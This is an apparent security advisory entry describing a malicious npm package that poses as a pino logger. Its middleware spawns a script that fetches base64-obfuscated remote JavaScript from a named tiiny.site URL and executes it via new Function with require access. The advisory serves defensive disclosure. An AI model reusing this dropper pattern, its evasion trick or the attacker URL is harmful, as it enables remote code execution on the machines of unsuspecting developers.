---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (93d9609d2eac0c0ff33aed557171138930255798aa649fa648b04814c8cb1908)

Package presents itself as a pino-compatible logger (README badges link to pinojs/pino, exports alias module.exports.pino = middleware) but its exported middleware spawns a detached node lib/initializeCaller.js. That script base64-decodes a hardcoded URL to https://aqua-margit-84.tiiny.site/index.json, fetches the JSON over HTTPS with a base64-obfuscated x-secret-key header, takes the data.cookie field, and executes it via new Function.constructor("require", response)(require) — compiling and running attacker-controlled JavaScript with full Node require access. The fetch retries 5 times. The C2 URL and header name/value are stored as base64 in a fake process object to evade plain-text scanning. tiiny.site is an anonymous static-hosting service; the content at that URL is mutable and attacker-controlled. This is a remote-code-execution dropper that fires when a consumer application invokes the advertised middleware, giving the attacker arbitrary code execution on any host running the application.